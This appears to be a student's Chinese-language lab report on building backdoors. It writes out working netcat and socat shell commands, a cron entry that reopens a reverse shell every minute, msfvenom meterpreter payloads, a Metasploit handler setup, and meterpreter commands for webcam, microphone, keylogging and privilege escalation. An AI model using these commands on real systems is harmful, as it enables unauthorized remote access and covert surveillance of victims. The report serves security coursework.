1.实验内容
(1)使用netcat获取主机操作Shell,cron启动定时任务
(2)使用socat获取主机操作Shell, 任务计划启动
(3)使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
(4)使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
(5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。
2.实验过程
(1)使用netcat获取主机操作Shell,cron启动定时任务
首先获取主机的ip地址:
接着windows打开监听:
在kali中使用cron指令:输入 crontab -e 并在最后一行添加 * * * * * /bin/netcat 192.168.1.160 8888 -e /bin/sh,让kali每分钟都执行一次指令,并可以用crontab -l指令查看:
windows获得kali的shell:
(2)使用socat获取主机操作Shell, 任务计划启动
创建计划程序,设置名称,触发器,选择执行程序并在添加层数处输入指令tcp-listen:8888 exec:cmd.exe,pty,stderr把cmd.exe绑定到端口8888。
到达指定时间后点击运行Windows会出现弹窗,在kali上启动监听,以连接上windows的shell
(3)使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
在Kali上执行指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.41.132 LPORT=8880 -f exe > meter_backdoor.exe生成后门程序“meter_backdoor.exe”。
在Windows下执行ncat.exe -l 8888 > meter_backdoor.exe,这样被控主机就进入了接收文件模式,在kali中执行nc 192.168.0.100 5121 < meter_backdoor.exe
windows成功接受了kali的exe文件
在kali上使用msfconsole指令进入msf控制台
输入use exploit/multi/handler使用监听模块,设置payload
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.41.132,这里用的是Kali的IP
set LPORT 8888,同样要使用相同的端口
设置完成之后,输入指令exploit执行监听,并运行Windows下的后门程序,此时kali上已经获得了Windows主机的连接,并且得到了远程控制的shell
(4)使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
使用record_mic指令可以截获一段音频
使用webcam_snap指令可以使用摄像头进行拍照
使用screenshot指令可以进行截屏
使用keyscan_start指令记录下击键的过程,使用keyscan_dump指令读取击键记录
使用getuid指令查看当前用户,使用getsystem指令进行提权操作
(5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。
获得主机shell:msfvenom -p linux/x86/reverse_tcp LHOST=192.168.41.132 LPORT=8888 -x ./pwn20192407 -f elf >20192407xjypwnshellcode
并监听
3.问题及解决方案
- 问题1:windows无法运行 ncat.exe
- 问题1解决方案:将其换为兼容win7模式即可 。
- 问题2:监听时无法产生音频
- 问题2解决方案:电脑录音权限未打开,打开即可。
- 问题3:打开文件权限不足
- 问题3解决方案:使用chmod u+x *命令提权。
回答问题:
(1)例举你能想到的一个后门进入到你系统中的可能方式?
qq,微信的一些可疑链接
(2)例举你知道的后门如何启动起来(win及linux)的方式?
通过驱动程序启动
(3)Meterpreter有哪些给你映像深刻的功能?
截获音频,使用摄像头,获得截屏,记录击键等
(4)如何发现自己有系统有没有被安装后门?
任务管理器查看有无可疑程序
4.学习感悟、思考等
本次实验内容虽然看似不多,但是在实际操作时还是遇到了很多问题,且电脑的一些设置也会对实验造成影响。通过这次实验,我对后门的知识有了进一步的了解,也对网络攻防的手段和预防有了更好的理解。